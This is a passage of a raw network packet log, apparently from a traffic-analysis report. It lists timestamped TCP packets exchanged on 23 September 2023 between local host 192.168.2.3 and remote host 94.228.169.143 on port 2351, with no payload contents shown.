                                    Sep 23, 2023 08:02:05.458970070 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.459009886 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.459017038 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.459069967 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.459115982 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.459116936 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.459167004 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.459207058 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.510917902 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.510991096 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.511065960 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.777838945 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.777904987 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.777944088 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.777982950 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.777986050 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.778031111 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.778111935 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.778150082 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.778187990 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.778193951 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.778228998 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.778275013 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.778372049 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.778414011 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.778460979 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.778497934 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.778538942 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.778582096 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.778588057 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.778661966 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.778702974 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.778747082 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.778824091 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.778865099 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.779360056 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.779512882 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.779556990 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.779597998 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.779803991 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.779846907 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.780608892 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.780669928 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.780714989 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.780725002 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.780797958 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.780837059 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.780847073 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.780896902 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.780947924 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.780963898 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.781013012 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.781056881 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.781071901 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.781091928 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.781130075 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.781156063 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.781224966 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.781269073 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.781426907 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.781490088 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.781506062 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.781538010 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.781605959 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.781625032 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.781650066 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.781687975 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.781730890 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.781733990 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.781800985 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.781843901 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.781927109 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.781965971 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.782008886 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.782026052 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.782058001 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.782098055 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.782104015 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.782160044 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.782205105 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.782217026 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.782274008 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.782314062 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.832417011 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.832699060 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.832793951 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.099708080 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.099776030 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.099812984 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.099850893 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.099894047 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.099930048 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.099967957 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.100007057 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.100042105 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.100079060 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.100112915 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.100150108 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.100186110 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.100228071 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.100267887 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.100303888 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.100450039 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.100486040 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.100569010 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.100760937 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.100826025 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.100970030 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.101031065 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.101067066 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.101984978 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.102000952 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.102075100 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.102158070 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.102188110 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.102214098 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.102278948 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.102294922 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.102385044 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.102484941 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.102519989 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.102570057 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.102653027 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.102679968 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.102863073 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.102879047 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.102895021 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.102917910 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.102932930 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.102988005 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.103037119 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.103055954 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.103121042 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.103180885 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.103223085 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.103250027 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.103368998 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.103384972 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.103442907 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.103507996 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.103636026 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.103712082 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.103745937 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.103789091 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.103846073 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.103898048 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.103955984 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.103972912 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.104059935 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.104077101 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.104343891 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.104387999 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.104439020 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.104532957 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.104619980 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.104759932 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.104827881 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.104856014 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.104923964 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.104964972 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.104980946 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.105082989 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.109638929 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.109863997 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.109922886 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.110131979 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.154139042 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.154158115 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.154247046 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.431905031 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.431972980 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.432013988 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.432050943 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.432096004 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.432132959 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.432172060 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.432183981 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.432183981 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.432183981 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.432329893 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.432370901 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.432462931 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.432559967 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.432600975 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.432636023 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.432712078 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.432712078 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.432806969 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.432847977 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.432917118 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.432952881 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.433046103 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.433063984 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.433083057 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.433100939 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.433182001 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.433233023 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.433286905 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.433324099 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.433372974 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.433414936 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.433510065 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.433556080 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.433595896 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.433634043 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.433675051 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.433686972 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.433743000 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.433787107 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.433810949 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.433851004 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.433886051 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.433897018 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.434052944 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.434091091 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.434118986 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.434125900 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.434182882 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.434253931 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.434519053 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.434581041 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.434592962 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.434617996 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.434648037 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.434657097 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.434678078 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.434704065 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.434720039 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.434732914 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.434758902 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.434772015 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.434837103 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.434856892 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.434876919 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.434878111 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.434911966 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.435061932 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.435121059 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.435159922 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.435287952 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.435301065 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.435342073 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.435360909 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.435383081 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.435416937 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.435436010 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.435491085 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.435542107 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.435549021 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.435564041 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.435599089 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.435627937 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.435754061 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.435801029 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.435822010 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.435834885 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.435873032 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.436069012 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.436235905 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.436249018 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.436283112 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.436409950 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.436450958 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.436455965 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.436520100 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.436533928 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.436562061 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.436616898 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.436642885 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.436659098 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.436758995 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.436805010 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.436810017 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.436872005 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.436917067 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.437022924 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.437083006 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.437120914 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.437133074 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.437200069 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.437239885 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.479844093 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.479867935 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.479926109 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.755233049 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.755278111 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.755315065 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.755350113 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.755363941 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.755402088 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.755414963 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.755481005 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.755517960 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.755527973 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.755664110 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.755711079 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.755763054 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.755949020 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.755987883 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.756002903 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.756059885 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.756108999 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.756150961 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.756222010 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.756273985 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.756319046 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.756390095 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.756427050 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.756441116 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.756464005 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.756508112 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.756531000 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.756567955 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.756604910 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.756617069 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.756642103 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.756688118 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.756742001 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.756840944 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.756891966 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.756970882 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.757031918 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.757071018 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.757085085 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.757277966 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.757318974 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.757328033 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.757355928 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.757404089 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.757424116 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.757496119 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.757546902 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.757623911 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.757714987 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.757750988 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.757771015 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.757884026 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.757922888 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.757930040 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.757961035 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:06.758004904 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:06.758029938 CEST23514971494.228.169.143192.168.2.3
